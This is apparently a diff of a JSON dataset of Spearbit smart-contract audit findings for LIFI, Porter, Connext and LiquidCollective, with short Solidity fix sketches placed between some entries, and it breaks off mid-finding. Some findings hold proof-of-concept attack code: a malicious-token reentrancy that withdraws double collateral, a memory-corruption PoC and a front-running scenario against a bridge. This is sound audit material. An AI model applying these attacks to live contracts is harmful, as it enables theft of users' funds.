There are still some instances of require usage in ConsensusLayerDepositManager and BytesLib contracts that could be replaced with custom errors.", + "title": "Missing two-step transfer ownership pattern", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The Executor contract is used for arbitrary cross-chain and same chain execution, swaps and transfers. The Executor contract uses Ownable from OpenZeppelin, which is a simple mechanism to transfer the ownership, not supporting a two-step transfer ownership pattern. OpenZeppelin describes Ownable as: Ownable is a simpler mechanism with a single owner \"role\" that can be assigned to a single account. This simpler mechanism can be useful for quick tests but projects with production concerns are likely to outgrow it. Transferring ownership is a critical operation, and transferring it to an inaccessible wallet or renouncing the ownership, e.g. by mistake, can effectively cause lost functionality.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Both wlsETH and lsETH transferFrom implementation allow the owner of the token to use trans- ferFrom like if it was a \"normal\" transfer", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The current implementation of transferFrom allow the msg.sender to use the function like if it was a \"normal\" transfer. In this case, the allowance is checked only if the msg.sender is not equal to _from if (_from != msg.sender) { uint256 currentAllowance = ApprovalsPerOwner.get(_from, msg.sender); if (currentAllowance < _value) { revert AllowanceTooLow(_from, msg.sender, currentAllowance, _value); } ApprovalsPerOwner.set(_from, msg.sender, currentAllowance - _value); } This implementation diverge from what is usually implemented in both Solmate and OpenZeppelin.", + "title": "Use low-level call only on contract addresses", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "In the following case, if callTo is an EOA, success will be true. (bool success, ) = callTo.call(callData); The user's intention here is to do a smart contract call. So if there is no code deployed at callTo, the execution should be reverted. Otherwise, users can be under a wrong assumption that their cross-chain call was successful.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Both wlsETH and lsETH tokens are reducing the allowance when the allowed amount is type(uint256).max", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The current implementation of the function transferFrom in both SharesManager.1.sol and WLSETH.1.sol is not taking into consideration the scenario where a user has approved a spender the maximum possible allowance type(uint256).max. The Alluvial transferFrom acts differently from standard ERC20 implementations like the one from Solmate and OpenZeppelin. 
In their implementation, they check and reduce the spender allowance if and only if the allowance is different from type(uint256).max.", + "title": "Functions which do not expect ether should be non-payable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "A function which doesn't expect ether should not be marked payable. swapAndStartBridgeTokensViaAmarok() is a payable function, however it reverts when called for the native asset: if (_bridgeData.assetId == address(0)) { revert TokenAddressIsZero(); } So in the case where _bridgeData.assetId != address(0), any ether sent as msg.value is locked in the contract.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Missing, confusing or wrong natspec comments", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "In the current implementation not all the constructors, functions, events, custom errors, variables or struct are covered by natspec comments. Some of them are only partially covered (missing @param, @return and so on). Note that the contracts listed in the context section of the issue have inside of them complete or partial missing natspec. Natspec Fixes / Typos: River.1.sol#L38-L39 Swap the empty line with the NatSpec @notice - /// @notice Prevents unauthorized calls - + + /// @notice Prevents unauthorized calls OperatorsRegistry.1.sol#L44, OperatorsRegistry.1.sol#L61, OperatorsRegistry.1.sol#L114 Replace name with index. - /// @param _index The name identifying the operator + /// @param _index The index identifying the operator OperatorsRegistry.1.sol#L218 Replace cound with count. - /// @notice Changes the operator stopped validator cound + /// @notice Changes the operator stopped validator count Expand the natspec explanation: We also suggest expanding some function's logic inside the natspec OperatorsRegistry.1.sol#L355-L358 Expand the natspec documentation and add a @return natspec comment clarifying that the returned value is the number of total operator and not the active/fundable one. ReportsVariants.sol#L5 Add a comment that explains the COUNT_OUTMASK's assignment. This will mask beaconValidators and beacon- Balance in the designed packing. xx...xx xxxx & COUNT_OUTMASK == 00...00 0000 ReportsVariants.sol ReportsVariants should have a documentation regarding the packing used for ReportsVariants in an uint256: [ 0, 16) : oracle member's total vote count for the numbers below (uint16, 2 bytes) ,! [16, [48, 112) : 48) : total number of beacon validators (uint32, 4 bytes) total balance of all the beacon validators (uint64, 6 bytes) OracleMembers.sol Leave a comment/warning that only there could a maximum of 256 oracle members. This is due to the Report- sPosition setup where in an uint256, 1 bit is reserved for each oracle member's index. ReportsPositions.sol 63 Leave a comment/warning for the ReportsPosition setup that the ith bit in the uint256 represents whether or not there has been a beacon report by the ith oracle member. Oracle.1.sol#L202-L205 Leave a comment/warning that only there could a maximum of 256 oracle members. This is due to the Report- sPosition setup where in an uint256, 1 bit is reserved for each oracle member's index. Allowlist.1.sol#L46-L49 Leave a comment, warning that the permission bitmaps will be overwritten instead of them getting updated. 
OracleManager.1.sol#L44 Add more comment for _roundId to mention that when the setBeaconData is called by Oracle.1.sol:_push- ToRiver and that the value passed to it for this parameter is always the 1st epoch of a frame. OperatorsRegistry.1.sol#L304-L310 _indexes parameter, mentioning that this array: 1) needs to be duplicate-free and sorted (DESC) 2) each element in the array needs to be in a specific range, namely operator.[funded, keys). OperatorsRegistry.1.sol#L60-L62 Better rephrase the natspec comment to avoid further confusion. Oracle.1.sol#L284-L289 Update the reportBeacon natspec documentation about the _beaconValidators parameter to avoid further con- fusion. Client answer to the PR comment The docs should be updated to also reflect our plans for the Shanghai fork. Basically we can't just have the same behavior for a negative delta in validator count than with a positive delta (where we just assume that each validator that was in the queue only had 32 eth). Now when we exit validator we need to know how much was exited in order to compute the proper revenue value for the treasury and operator fee. This probably means that there will be an extra arg with the oracle to keep track of the exited eth value. But as long as the spec is not final, we'll stick to the validator count always growing. We should definitely add a custom error to explain that in case a report provides a smaller validator count.", + "title": "Incompatible contract used in the WormholeFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "During the code review, it has been observed that all other facets use the SwapperV2 contract. However, the WormholeFacet is still using the Swapper contract. With the recent change to SwapperV2, leftovers can be sent to a specific receiver. By using the old contract, this capability is lost in this facet. Also, the LiFi team states that the Swapper contract will be deprecated. ... import { Swapper } from \"../Helpers/Swapper.sol\"; /// @title Wormhole Facet /// @author [LI.FI](https://li.fi) /// @notice Provides functionality for bridging through Wormhole contract WormholeFacet is ILiFi, ReentrancyGuard, Swapper { ...", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Remove unused imports from code", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The codebase has unused imports across the code base. If they are not used inside the contract, it would be better to remove them to avoid confusion.", + "title": "Solidity version bump to latest", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "During the review, the newest version of Solidity was released with important bug fixes.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Missing event emission in critical functions, init functions and setters", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "Some critical functions like contract's constructor, contract's init*(...)function (upgradable con- tracts) and some setter or in general critical functions are missing event emission.
Event emissions are very useful for external web3 applications, but also for monitoring the usage and security of your protocol when paired with external monitoring tools. Note: in the init*(...)/constructor function, consider if adding a general broad event like ContractInitial- ized or split it in more specific events like QuorumUpdated+OwnerChanged+... 65 Note: in general, consider adding an event emission to all the init*(...) functions used to initialize the upgrad- able contracts, passing to the event the relevant args in addition to the version of the upgrade.", + "title": "Bridge with AmarokFacet can fail due to hardcoded variables", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "During the code review, it has been observed that callbackFee and relayerFee are set to 0. However, Connext mentioned that they are only set to 0 on the testnet. On the mainnet, these variables can be edited by Connext, and AmarokFacet bridge operations can fail. ... IConnextHandler.XCallArgs memory xcallArgs = IConnextHandler.XCallArgs({ params: IConnextHandler.CallParams({ to: _bridgeData.receiver, callData: _bridgeData.callData, originDomain: _bridgeData.srcChainDomain, destinationDomain: _bridgeData.dstChainDomain, agent: _bridgeData.receiver, recovery: msg.sender, forceSlow: false, receiveLocal: false, callback: address(0), callbackFee: 0, // fee paid to relayers; relayers don't take any fees on testnet relayerFee: 0, // fee paid to relayers; relayers don't take any fees on testnet slippageTol: _bridgeData.slippageTol }), transactingAssetId: _bridgeData.assetId, amount: _amount }); ...", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Informational" + "LIFI", + "Severity: Low Risk" ] }, { - "title": "Freeze Redeems if bonds too Large", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", - "body": "Issuing too many bonds can result in users being unable to redeem. This is caused by arithmetic overow in previewRedeemAtMaturity. If a users bonds andpaidAmounts (or bonds * nonPaidAmount) product is greater than 2**256, it will overow, reverting all attempts to redeem bonds.", + "title": "Store _dexs[i] into a temp variable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The DexManagerFacet can store _dexs[i] into a temporary variable to save some gas. function batchAddDex(address[] calldata _dexs) external { if (msg.sender != LibDiamond.contractOwner()) { LibAccess.enforceAccessControl(); } mapping(address => bool) storage dexAllowlist = appStorage.dexAllowlist; uint256 length = _dexs.length; for (uint256 i = 0; i < length; i++) { _checkAddress(_dexs[i]); if (dexAllowlist[_dexs[i]]) continue; dexAllowlist[_dexs[i]] = true; appStorage.dexs.push(_dexs[i]); emit DexAdded(_dexs[i]); } }", "labels": [ "Spearbit", - "Porter", - "Severity: Medium Risk" + "LIFI", + "Severity: Gas Optimization" ] }, { - "title": "Reentrancy in withdrawExcessCollateral() and withdrawExcessPayment() functions.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", - "body": "withdrawExcessCollateral() and withdrawExcessPayment() enable the caller to withdraw excess collateral and payment tokens respectively. Both functions are guarded by an onlyOwner modier, limiting their access to the owner of the contract.
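As a sketch of the caching suggested in "Store _dexs[i] into a temp variable" above; storage layout and access control are simplified away, only the loop body is the point.
pragma solidity ^0.8.13;
contract BatchAddDexSketch {
    event DexAdded(address indexed dex);
    mapping(address => bool) internal dexAllowlist;
    address[] internal dexs;
    function batchAddDex(address[] calldata _dexs) external {
        uint256 length = _dexs.length;
        for (uint256 i = 0; i < length; i++) {
            address dex = _dexs[i]; // read calldata once instead of five times per iteration
            if (dexAllowlist[dex]) continue;
            dexAllowlist[dex] = true;
            dexs.push(dex);
            emit DexAdded(dex);
        }
    }
}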
function withdrawExcessCollateral(uint256 amount, address receiver) external onlyOwner function withdrawExcessPayment(address receiver) external onlyOwner When transferring tokens, execution ow is handed over to the token contract. Therefore, if a malicious token manages to call the owners address it can also call these functions again to withdraw more tokens than required. As an example consider the following case where the collateral tokens transferFrom() function calls the owners address: 4 function transferFrom( address from, address to, uint256 amount ) public virtual override returns (bool) { if (reenter) { reenter = false; owner.attack(bond, amount); } address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } and the owner contract has a function: function attack(address _bond, uint256 _amount) external { IBond(_bond).withdrawExcessCollateral(_amount, address(this)); } When withdrawExcessCollateral() is called by owner, it allows it to withdraw double the amount via reentrancy.", + "title": "Optimize array length in for loop", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "In a for loop the length of an array can be put in a temporary variable to save some gas. This has been done already in several other locations in the code. function swapAndStartBridgeTokensViaStargate(...) ... { ... for (uint8 i = 0; i < _swapData.length; i++) { ... } ... }", "labels": [ "Spearbit", - "Porter", - "Severity: Medium Risk" + "LIFI", + "Severity: Gas Optimization" ] }, { - "title": "burn() and burnFrom() allow users to lose their bonds", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", - "body": "The Bond contract inherits from ERC20BurnableUpgradeable. contract Bond is IBond, OwnableUpgradeable, ERC20BurnableUpgradeable, This exposes the burn() and burnFrom() functions to users who could get their bonds burned due to an error or a front-end attack.", + "title": "StargateFacet can be optimized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "It might be cheaper to call getTokenFromPoolId in the constructor and store the result in immutable variables (especially because there are not that many pools, currently at most 3 pool IDs per chain). On the other hand, it requires an update of the facet when new pools are added though. function getTokenFromPoolId(address _router, uint256 _poolId) private view returns (address) { address factory = IStargateRouter(_router).factory(); address pool = IFactory(factory).getPool(_poolId); return IPool(pool).token(); } For the srcPoolId it would be possible to replace this with a token address in the calling interface and look up the pool ID. However, for dstPoolId this would be more difficult, unless you restrict it to the case where srcPoolId == dstPoolId, e.g. the same asset is received on the destination chain. This seems a logical restriction.
The advantage of not having to specify the poolids is that you abstract the interface from the caller and make the function calls more similar.", "labels": [ "Spearbit", - "Porter", - "Severity: Low Risk" + "LIFI", + "Severity: Gas Optimization" ] }, { - "title": "Missing two-step transfer ownership pattern", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", - "body": "After a bond is created its ownership is transferred to the wallet which invoked the createBond function, but it can be later transferred to anyone at any time or the renounceOwnership function can be called. The Bond contract uses the Ownable Openzeppelin contract, which is a simple mechanism to transfer ownership without supporting a two-step ownership transfer pattern. OpenZeppelin describes Ownable as: Ownable is a simpler mechanism with a single owner \"role\" that can be assigned to a single account. This simpler mechanism can be useful for quick tests but projects with production concerns are likely to outgrow it. Ownership transfer is a critical operation and transferring it to an inaccessible wallet or renouncing ownership by mistake can effectively lock the collateral in the contract forever.", + "title": "Use block.chainid for chain ID verification in HopFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "HopFacet.sol uses the user-provided _hopData.fromChainId to identify the current chain ID. The call to the Hop Bridge will revert if it does not match block.chainid, so this is still secure. However, as a gas optimization, this parameter can be removed from the HopData struct, and its usage can be replaced by block.chainid.", "labels": [ "Spearbit", - "Porter", - "Severity: Low Risk" + "LIFI", + "Severity: Gas Optimization" ] }, { - "title": "Inefcient initialization of minimal proxy implementation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", - "body": "The Bond contract uses a minimal proxy pattern when deployed by BondFactory. The proxy pattern requires a special initialize method to be called to set the state of each cloned contract. Nevertheless, the implementation contract can be left uninitialized, giving an attacker the opportunity to invoke the initialization. constructor() { tokenImplementation = address(new Bond()); _grantRole(DEFAULT_ADMIN_ROLE, _msgSender()); } After the reporting the issue it was discovered that a separate (not merged) development branch implements a deployment script which initializes the Bond implementation contract after the main deployment of BondFactory, leaving a narrow window for the attacker to leverage this issue and reducing impact signicantly.
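Returning to "StargateFacet can be optimized" above, a sketch of the constructor-time caching; the interfaces come from the quoted snippet, while the single-pool constructor argument is our assumption.
pragma solidity ^0.8.13;
interface IStargateRouter { function factory() external view returns (address); }
interface IFactory { function getPool(uint256 _poolId) external view returns (address); }
interface IPool { function token() external view returns (address); }
contract StargateTokenCacheSketch {
    // resolved once at deployment instead of three external calls per bridge transaction
    address public immutable poolToken;
    constructor(address _router, uint256 _poolId) {
        address factory = IStargateRouter(_router).factory();
        address pool = IFactory(factory).getPool(_poolId);
        poolToken = IPool(pool).token();
    }
}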
deploy_bond_factory.ts#L24 6 const implementationContract = (await ethers.getContractAt( \"Bond\", await factory.tokenImplementation() )) as Bond; try { await waitUntilMined( await implementationContract.initialize( \"Placeholder Bond\", \"BOND\", deployer, THREE_YEARS_FROM_NOW_IN_SECONDS, \"0x0000000000000000000000000000000000000000\", \"0x0000000000000000000000000000000000000001\", ethers.BigNumber.from(0), ethers.BigNumber.from(0), 0 ) ); } catch (e) { console.log(\"Is the contract already initialized?\"); console.log(e); } Due to the fact that the initially reviewed code did not have the proper initialization for the Bond implementation (as it was an unmerged branch) and because in case of a successful exploitation the impact on the system remains minimal, this nding is marked as low risk. It is not necessary to create a separate transaction and initialize the storage of the implementation contract to prevent unauthorized initialization.", + "title": "Rename error InvalidAmount(uint256) to ZeroAmount()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The custom error InvalidAmount(uint256) is raised only with an argument of 0: if (_amount <= 0) { revert InvalidAmount(_amount); } ... if (msg.value <= 0) { revert InvalidAmount(msg.value); } Since amount and msg.value can only be non-negative, these if conditions succeed only when these values are 0. Hence, only InvalidAmount(0) is ever raised.", "labels": [ "Spearbit", - "Porter", - "Severity: Low Risk" + "LIFI", + "Severity: Gas Optimization" ] }, { - "title": "Verify amount is greater than 0 to avoid unnecessarily safeTransfer() calls", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", - "body": "Balance should be checked to avoid unnecessary safeTransfer() calls with an amount of 0.", + "title": "Use custom errors instead of strings", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "To save some gas, the use of custom errors leads to cheaper deploy-time and run-time cost. The run-time cost is only relevant when the revert condition is met (see e.g. LibDiamond.sol#L56).", "labels": [ "Spearbit", - "Porter", - "Severity: Gas Optimization" + "LIFI", + "Severity: Gas Optimization" ] }, {
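A sketch contrasting the two styles for the custom-errors finding above; the LibDiamond owner check is used as the example, with simplified storage.
pragma solidity ^0.8.13;
contract CustomErrorSketch {
    error NotContractOwner(address caller); // 4-byte selector + one word vs. a full ASCII string
    address internal contractOwner;
    function enforceIsContractOwner() internal view {
        // string version (more expensive to deploy and to revert with):
        // require(msg.sender == contractOwner, "LibDiamond: Must be contract owner");
        if (msg.sender != contractOwner) revert NotContractOwner(msg.sender);
    }
}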
/// @inheritdoc IBondFactory function createBond( string memory name, string memory symbol, uint256 maturity, address paymentToken, address collateralToken, uint256 collateralTokenAmount, uint256 convertibleTokenAmount, uint256 bonds ) external onlyIssuer returns (address clone)", + "title": "Use calldata over memory", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "When a function with a memory array is called externally, the abi.decode() step has to use a for-loop to copy each index of the calldata to the memory index. Each iteration of this for-loop costs at least 60 gas (i.e. 60 * .length). Using calldata directly obviates the need for such a loop in the contract code and runtime execution. If the array is passed to an internal function which passes the array to another internal function where the array is modified and therefore memory is used in the external call, it's still more gas-efficient to use calldata when the external function uses modifiers, since the modifiers may prevent the internal functions from being called. Some gas can be saved if function arguments are passed as calldata instead of memory.", "labels": [ "Spearbit", - "Porter", - "Severity: Informational" + "LIFI", + "Severity: Gas Optimization" ] }, { - "title": "Incorrect revert message", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", - "body": "error BondBeforeGracePeriodOrPaid() is used to revert when !isAfterGracePeriod() && amountPaid() > 0, which means the bonds is before the grace period and not paid for. Therefore, the error description is incorrect. if (isAfterGracePeriod() || amountUnpaid() == 0) { _; } else { revert BondBeforeGracePeriodOrPaid(); }", + "title": "Avoid reading from storage when possible", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Functions which can only be called by the contract's owner can use msg.sender instead of reading the owner's address after the ownership check is done. In all the cases below, the ownership check is already done, so it is guaranteed that owner == msg.sender. LibAsset.transferAsset(tokenAddress, payable(owner), balance); ... LibAsset.transferAsset(tokenAddresses[i], payable(owner), balance); ... if (_newOwner == owner) revert NewOwnerMustNotBeSelf(); owner is a state variable, so reading it has significant gas costs. This can be avoided here by using msg.sender instead.", "labels": [ "Spearbit", - "Porter", - "Severity: Informational" + "LIFI", + "Severity: Gas Optimization" ] }, { - "title": "Non-existent bonds naming/symbol restrictions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", - "body": "The issuer can dene any name and symbol during bond creation. Naming is neither enforced nor constructed by the contract and may result in abusive or misleading names which could have a negative impact on the PR of the project. /// @inheritdoc IBondFactory function createBond( string memory name, string memory symbol, uint256 maturity, address paymentToken, address collateralToken, uint256 collateralTokenAmount, uint256 convertibleTokenAmount, uint256 bonds ) external onlyIssuer returns (address clone) A malicious user could hypothetically use arbitrary names to: Mislead users into thinking they are buying bonds consisting of different tokens. Use abusive names to discredit the team.
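For "Avoid reading from storage when possible" above, a minimal sketch (simplified ownership storage is ours) of reusing msg.sender once the check has passed; it is grounded in the quoted NewOwnerMustNotBeSelf comparison.
pragma solidity ^0.8.13;
contract MsgSenderOverOwnerSketch {
    error NewOwnerMustNotBeSelf();
    address internal owner;
    function transferOwnership(address _newOwner) external {
        require(msg.sender == owner, "not owner"); // one SLOAD for the check
        // After the check, owner == msg.sender is guaranteed,
        // so compare against msg.sender instead of re-reading storage.
        if (_newOwner == msg.sender) revert NewOwnerMustNotBeSelf();
        owner = _newOwner;
    }
}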
Attempt to exploit the frontend application by injecting arbitrary HTML data. The team had a discussion regarding naming conventions in the past. However, not all the abovementioned scenarios were brought up during that conversation. Therefore, this nding is reported as informational to revisit and estimate its potential impact, or add it as a test case during the web application implementation.", + "title": "Increment for loop variable in an unchecked block", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "(This is only relevant if you are using the default solidity checked arithmetic). i++ involves checked arithmetic, which is not required. This is because the value of i is always strictly less than length <= 2**256 - 1. Therefore, the theoretical maximum value of i to enter the for-loop body is 2**256 - 2. This means that the i++ in the for loop can never overflow. Regardless, the overflow checks are performed by the compiler. Unfortunately, the Solidity optimizer is not smart enough to detect this and remove the checks. One can manually do this by: for (uint i = 0; i < length; ) { // do something that doesn't change the value of i unchecked { ++i; } }", "labels": [ "Spearbit", - "Porter", - "Severity: Informational" + "LIFI", + "Severity: Gas Optimization" ] }, { - "title": "Needles variable initialization for default values", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", - "body": "uint256 variable are initialized to a default value of zero per Solidity docs. Setting a variable to the default value is unnecessary.", + "title": "Executor should consider pre-deployed contract behaviors", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The Executor contract allows users to do arbitrary calls. This allows users to trigger pre-deployed contracts (which are used on specific chains). Since the behaviors of pre-deployed contracts differ, dapps on different EVM-compatible chains would have different security assumptions. Please refer to the Avax bug fix: Native-asset-call-deprecation. Were the native asset call not deprecated, exploiters could bypass the check and trigger ERC20Proxy through the pre-deployed contract. Since the Avalanche team has deprecated the dangerous pre-deployed contract, the current Executor contract is not vulnerable. Moonbeam's pre-deployed contracts also have strange behaviors. The precompiled ERC20 allows users to transfer the native token through an ERC20 interface. Users can steal native tokens on the Executor by setting callTo = address(802) and calldata = transfer(receiver, amount). One of the standard Ethereum mainnet precompiles is \"Identity\" (0x4), which copies memory. Depending on the use of memory variables of the function that does the callTo, it can corrupt memory. Here is a POC: pragma solidity ^0.8.17; import \"hardhat/console.sol\"; contract Identity { function CorruptMem() public { uint dest = 128; uint data = dest + 1; uint len = 4; assembly { if iszero(call(gas(), 0x04, 0, add(data, 0x20), len, add(dest,0x20), len)) { invalid() } } } constructor() { string memory a = \"Test!\"; CorruptMem(); console.log(string(a)); // --> est!!
} }", "labels": [ "Spearbit", - "Porter", + "LIFI", "Severity: Informational" ] }, { - "title": "Deationary payment tokens are not handled in the pay() function", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Porter-Spearbit-Security-Review.pdf", - "body": "The pay() function does not support rebasing/deflationary/inflationary payment tokens whose balance changes during transfers or over time. The necessary checks include at least verifying the amount of tokens transferred to contracts before and after the actual transfer to infer any fees/interest.", + "title": "Documentation improvements", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "There are a few issues in the documentation: HyphenFacets documentation describes a function no longer present. Link to DexManagerFacet in README.md is incorrect.", "labels": [ "Spearbit", - "Porter", + "LIFI", "Severity: Informational" ] }, { - "title": "Lack of transferId Verification Allows an Attacker to Front-Run Bridge Transfers", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The onReceive() function does not verify the integrity of transferId against all other parameters. Although the onlyBridgeRouter modifier checks that the call originates from another BridgeRouter (assuming a correct configuration of the whitelist) to the onReceive() function, it does not check that the call originates from another Connext Diamond. Therefore, allowing anyone to send arbitrary data to BridgeRouter.sendToHook(), which is later interpreted as the transferId on Connexts NomadFacet.sol contract. This can be abused by a front-running attack as described in the following scenario: Alice is a bridge user and makes an honest call to transfer funds over to the destination chain. Bob does not make a transfer but instead calls the sendToHook() function with the same _extraData but passes an _amount of 1 wei. Both Alice and Bob have their tokens debited on the source chain and must wait for the Nomad protocol to optimistically verify incoming TransferToHook messages. Once the messages have been replicated onto the destination chain, Bob processes the message before Alice, causing onReceive() to be called on the same transferId. However, because _amount is not verified against the transferId, Alice receives significantly less tokens and the s.reconciledTransfers mapping marks the transfer as reconciled. Hence, Alice has effectively lost all her tokens during an attempt to bridge them. function onReceive( uint32, // _origin, not used uint32, // _tokenDomain, not used bytes32, // _tokenAddress, of canonical token, not used address _localToken, uint256 _amount, bytes memory _extraData ) external onlyBridgeRouter { bytes32 transferId = bytes32(_extraData); // Ensure the transaction has not already been handled (i.e. previously reconciled). if (s.reconciledTransfers[transferId]) { revert NomadFacet__reconcile_alreadyReconciled(); } // Mark the transfer as reconciled. s.reconciledTransfers[transferId] = true; Note: the same issues exists with _localToken. 
As a result a malicious user could perform the same attack by using a malicious token contract and transferring the same amount of tokens in the call to sendToHook().", + "title": "Check quoteTimestamp is within ten minutes", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "quoteTimestamp is not validated. According to Across, quoteTimestamp is the timestamp at which the depositor will be quoted for L1 liquidity; this enables the depositor to know the L1 fees before submitting their deposit. It must be within 10 minutes of the current time. function _startBridge(AcrossData memory _acrossData) internal { bool isNative = _acrossData.token == ZERO_ADDRESS; if (isNative) _acrossData.token = _acrossData.weth; else LibAsset.maxApproveERC20(IERC20(_acrossData.token), _acrossData.spokePool, _acrossData.amount); IAcrossSpokePool pool = IAcrossSpokePool(_acrossData.spokePool); pool.deposit{ value: isNative ? _acrossData.amount : 0 }( _acrossData.recipient, _acrossData.token, _acrossData.amount, _acrossData.destinationChainId, _acrossData.relayerFeePct, _acrossData.quoteTimestamp ); }", "labels": [ "Spearbit", - "Connext", - "Severity: Critical Risk" + "LIFI", + "Severity: Informational" ] }, { - "title": "swapOut allows overwrite of token balance", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", - "body": "The StableSwapFacet has the function swapExactOut() where a user could supply the same as- setIn address as assetOut, which means the TokenIndexes for tokenIndexFrom and tokenIndexTo function swapOut() are the same. In function swapOut() a temporay array is used to store balances. When updating such balances, first self.balances[tokenIndexFrom] is updated and then self.balances[tokenIndexTo] is updated afterwards. However when tokenIndexFrom == tokenIndexTo the second update overwrites the first update, causing token balances to be arbitrarily lowered. This also skews the exchange rates, allowing for swaps where value can be extracted. Note: the protection against this problem is location in function getY(). However, this function is not called from swapOut(). Note: the same issue exists in swapInternalOut(), which is called from swapFromLocalAssetIfNeededForEx- actOut() via _swapAssetOut(). However, via this route it is not possible to specify arbitrary token indexes. There- fore, there isnt an immediate risk here. 7 contract StableSwapFacet is BaseConnextFacet { ... function swapExactOut(... ,address assetIn, address assetOut, ... ) ... { return s.swapStorages[canonicalId].swapOut( getSwapTokenIndex(canonicalId, assetIn), getSwapTokenIndex(canonicalId, assetOut), amountOut, maxAmountIn // assetIn could be same as assetOut ); } ... } library SwapUtils { function swapOut(..., uint8 tokenIndexFrom, uint8 tokenIndexTo, ... ) ... { ... uint256[] memory balances = self.balances; ... self.balances[tokenIndexFrom] = balances[tokenIndexFrom].add(dx).sub(dxAdminFee); self.balances[tokenIndexTo] = balances[tokenIndexTo].sub(dy); // overwrites previous update if ,! From==To ... } function getY(..., uint8 tokenIndexFrom, uint8 tokenIndexTo, ... ) ... { ... require(tokenIndexFrom != tokenIndexTo, \"compare token to itself\"); // here is the protection ... } } Below is a proof of concept which shows that the balances of index 3 can be arbitrarily reduced.
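For the "Check quoteTimestamp is within ten minutes" finding above, a sketch of the freshness check; the ten-minute bound comes from the Across documentation quoted in the finding, while the error name is hypothetical.
pragma solidity ^0.8.13;
contract QuoteTimestampSketch {
    error QuoteTimestampTooOld(); // hypothetical error name
    uint256 internal constant MAX_QUOTE_AGE = 10 minutes;
    function checkQuoteTimestamp(uint64 quoteTimestamp) internal view {
        // reject quotes older than the window Across will accept
        if (block.timestamp > uint256(quoteTimestamp) + MAX_QUOTE_AGE) revert QuoteTimestampTooOld();
    }
}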
